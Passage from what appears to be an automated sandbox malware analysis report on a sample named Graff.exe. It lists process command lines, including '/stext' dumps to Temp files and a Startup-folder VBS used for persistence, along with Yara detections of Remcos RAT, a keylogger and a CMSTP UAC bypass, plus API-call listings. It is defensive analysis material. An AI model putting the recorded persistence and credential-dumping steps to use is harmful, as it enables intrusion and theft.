MD5 hash:	B596EDF7EBFB3A944A94685A207677BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:17:43
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\misruling\Graff.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"
Imagebase:	0x870000
File size:	962'048 bytes
MD5 hash:	B596EDF7EBFB3A944A94685A207677BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:17:43
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\misruling\Graff.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\zlegpdywxzwztnceqhblsxavxvk"
Imagebase:	0x870000
File size:	962'048 bytes
MD5 hash:	B596EDF7EBFB3A944A94685A207677BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:17:53
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs"
Imagebase:	0x7ff6f7d50000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:17:53
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\misruling\Graff.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\misruling\Graff.exe"
Imagebase:	0x870000
File size:	962'048 bytes
MD5 hash:	B596EDF7EBFB3A944A94685A207677BD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1512004348.0000000001800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1512067851.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	9.5%
Total number of Nodes:	734
Total number of Limit Nodes:	63

Executed Functions

Function 007342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0073430D

Part of subcall function 00736B57: _wcslen.LIBCMT ref: 00736B6A

GetCurrentProcess.KERNEL32(?,007CCB64,00000000,?,?), ref: 00734422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00734429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00734454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00734466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00734474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0073447B
GetSystemInfo.KERNEL32(?,?,?), ref: 007344A0

Strings

|O, xrefs: 007736F8
kernel32.dll, xrefs: 0073444F
GetNativeSystemInfo, xrefs: 00734460

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 784a61b84cba400211b6f99a59bd35bd1a1ea10d8bf7ffd29c73e45bc80eb2bb
Instruction ID: a09deb017e4c8ea5ac2ce99069acceb4b255fe16e6702da41bd07d798bcdeb6f
Opcode Fuzzy Hash: 784a61b84cba400211b6f99a59bd35bd1a1ea10d8bf7ffd29c73e45bc80eb2bb
Instruction Fuzzy Hash: E9A1F86190A2C0CFDF96C7797C8D5967FE47B26360F1A88ADE04593B23D23C5908DB61

Function 00733170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,0073316A,?,?), ref: 007331D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0073316A,?,?), ref: 00733204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00733227
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00733232
CreatePopupMenu.USER32 ref: 00733246
PostQuitMessage.USER32(00000000), ref: 00733267

Strings

TaskbarCreated, xrefs: 0073322D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 604ea5e40f7d7190d583bb4401b9cbb2c77cdadf22caa0081db18e49943aed38
Instruction ID: 0b1f3a5108065e1a891864862597baf080d19cc11dbe1a4daf05b9b4eb6d5b0e
Opcode Fuzzy Hash: 604ea5e40f7d7190d583bb4401b9cbb2c77cdadf22caa0081db18e49943aed38
Instruction Fuzzy Hash: 42411631640208EBFF751B789D0DB7A3B19FB05360F048129F51AC62E3CBBD8A4197A5

Function 007342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007342B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 007342C9
LoadResource.KERNEL32(?,00000000), ref: 007735BE
SizeofResource.KERNEL32(?,00000000), ref: 007735D3
LockResource.KERNEL32(?), ref: 007735E6

Strings

SCRIPT, xrefs: 007342BF

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 08cc1f204fb07dfe24862328bffe157dfd7f4ab5544167ec82355cd66a398883
Instruction ID: a2dae2e51ee880ca5839be6387cc066a0016e90d96a17b875782970f5fdabc68
Opcode Fuzzy Hash: 08cc1f204fb07dfe24862328bffe157dfd7f4ab5544167ec82355cd66a398883
Instruction Fuzzy Hash: 9B117C72200700BFEB268BA6DC49F277BBDFBC6B51F14816DF41696650DB75EC009A20

Function 0079DBBE Relevance: 6.0, APIs: 4, Instructions: 29
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,00775222), ref: 0079DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0079DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0079DBEE
FindClose.KERNEL32(00000000), ref: 0079DBFA

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: e0cc14473816d3bf6746afd9ade1dd35b143642aa94f074191f279b8d517bfe3
Instruction ID: dff90624fb69559fcb5eaaf72a44f3338122bc2bfbab5730826b6289b58b4a85
Opcode Fuzzy Hash: e0cc14473816d3bf6746afd9ade1dd35b143642aa94f074191f279b8d517bfe3
Instruction Fuzzy Hash: 5BF0A0708109145B9A316B78EC0D8AA777CAE02334F14870AF83AC20E0EBB85D5586A9

Function 0073D730 Relevance: 21.6, APIs: 14, Instructions: 631sleepsynchronizationtimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0073D807
timeGetTime.WINMM ref: 0073DA07
Sleep.KERNEL32(0000000A), ref: 0073DBB1
Sleep.KERNEL32(0000000A), ref: 00782B76
GetExitCodeProcess.KERNEL32(?,?), ref: 00782C11
WaitForSingleObject.KERNEL32(?,00000000), ref: 00782C29
CloseHandle.KERNEL32(?), ref: 00782C3D
Sleep.KERNEL32(?), ref: 00782CA9

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
String ID:
API String ID: 388478766-0
Opcode ID: bd10c3d25875fe98f45ea1c919ac218f8fd186460fb5cd452010409bd7729986
Instruction ID: c149ae5da2e4787b80f8386d8933afa46777aaa666433fc08b13ffc0440b7e76
Opcode Fuzzy Hash: bd10c3d25875fe98f45ea1c919ac218f8fd186460fb5cd452010409bd7729986
Instruction Fuzzy Hash: 2A421070648241EFE739DF24D888BAAB7E0FF45310F14855DE49687292D778EC45CB92

Function 0073344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00733A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,0073351C,?,?,?,?,0073106A,-00800FC4), ref: 00733A78

Part of subcall function 00733357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00733527,?,?,?,?,0073106A,-00800FC4), ref: 00733379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,0073106A,-00800FC4), ref: 0073356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,0073106A,-00800FC4), ref: 0077318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,0073106A,-00800FC4), ref: 007731CE
RegCloseKey.ADVAPI32(?,?,?,?,?,0073106A,-00800FC4), ref: 00773210
_wcslen.LIBCMT ref: 00773277
_wcslen.LIBCMT ref: 00773286

Strings

>y, xrefs: 007334E8
\Include\, xrefs: 00733527
Software\AutoIt v3\AutoIt, xrefs: 00733560
Include, xrefs: 00773184, 007731C5
\, xrefs: 0077328C

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: >y$Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2145476932
Opcode ID: 19a3f68fa6dded348d9acd77a25b59b5ee39d6a7365b24052a38958427d1a313
Instruction ID: c77137ba4c425735e5c6c6d14ae30d1a2cb68a2a17e04925c1b6270c397ddc4d
Opcode Fuzzy Hash: 19a3f68fa6dded348d9acd77a25b59b5ee39d6a7365b24052a38958427d1a313
Instruction Fuzzy Hash: AE71C471404301DED754EF65DC8A99BBBE8FF85340F41442EF549932B1EBB89A48CB61

Function 00732B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00732B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00732B9D
LoadIconW.USER32(00000063), ref: 00732BB3
LoadIconW.USER32(000000A4), ref: 00732BC5
LoadIconW.USER32(000000A2), ref: 00732BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00732BEF
RegisterClassExW.USER32(?), ref: 00732C40

Part of subcall function 00732CD4: GetSysColorBrush.USER32(0000000F), ref: 00732D07
Part of subcall function 00732CD4: RegisterClassExW.USER32(00000030), ref: 00732D31
Part of subcall function 00732CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00732D42
Part of subcall function 00732CD4: LoadIconW.USER32(000000A9), ref: 00732D85

Strings

AutoIt v3, xrefs: 00732C2F
0, xrefs: 00732C0F
#, xrefs: 00732C16

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: fe3e7666e7d12902cfd0e2f54cbe37ade8837a7a723445c98fca04f9dc11ba83
Instruction ID: c4dc1055ea3f86a442c13fe579f407a3a422e5cbfd7d0a28cae1f8eae9729854
Opcode Fuzzy Hash: fe3e7666e7d12902cfd0e2f54cbe37ade8837a7a723445c98fca04f9dc11ba83
Instruction Fuzzy Hash: B1214970E00318ABDF519FA5EC49BA97FF4FB08B60F05402AF504A67A0D3B90540CF94

Function 00732CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00732D07
RegisterClassExW.USER32(00000030), ref: 00732D31
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00732D42
LoadIconW.USER32(000000A9), ref: 00732D85

Strings

0, xrefs: 00732CE9
+, xrefs: 00732CF0
TaskbarCreated, xrefs: 00732D37
AutoIt v3 GUI, xrefs: 00732D23

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 3f4831efaca65f050ea02d419b49047ad226f8bafe56e1a1c57f5a724649da76
Instruction ID: 513ea2f0374f229ae9d6b98a677475024094a2f9996a5a2785b67abacc69676e
Opcode Fuzzy Hash: 3f4831efaca65f050ea02d419b49047ad226f8bafe56e1a1c57f5a724649da76
Instruction Fuzzy Hash: 0621EFB1D01308AFDF41DFA4EC89B9DBBB4FB08B10F00811AFA15A62A0D7B955408F94

Function 0171D8E0 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0171D925

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 0ad6f091f905026157ecd996a676ca84b02104752ef5b9ac3e94fe96ce754c22
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: A0510776A10209FBEB34DFE8CC49FDEB779AF48700F108554F60AEA180DA749A448F64

Function 00732C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00732C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00732CB2
ShowWindow.USER32(00000000,?,?,00732B2F), ref: 00732CC6
ShowWindow.USER32(00000000,?,?,00732B2F), ref: 00732CCF

Strings

AutoIt v3, xrefs: 00732C89, 00732C8E, 00732C8F
edit, xrefs: 00732CAC

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ba7b0239ce4f8373ea49f6177b755e6cb10466092be6d7947c3adccc8af4f80e
Instruction ID: 8c8aab3bfd432e1992875800218df0225de069845fa3015e5ad33f18f1dbb6ab
Opcode Fuzzy Hash: ba7b0239ce4f8373ea49f6177b755e6cb10466092be6d7947c3adccc8af4f80e
Instruction Fuzzy Hash: 38F0DA755403907AEB711717AC0CE772FBDEBC6F60B02505EF904A26A0C6791851DAB4

Function 007310F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00731BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00731BF4
Part of subcall function 00731BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00731BFC
Part of subcall function 00731BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00731C07
Part of subcall function 00731BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00731C12
Part of subcall function 00731BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00731C1A
Part of subcall function 00731BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00731C22

Part of subcall function 00731B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00731BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0073136A
OleInitialize.OLE32 ref: 00731388
CloseHandle.KERNEL32(00000000,00000000), ref: 007724AB

Strings

>y, xrefs: 007311C8, 0073129C
dMy, xrefs: 00731105

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
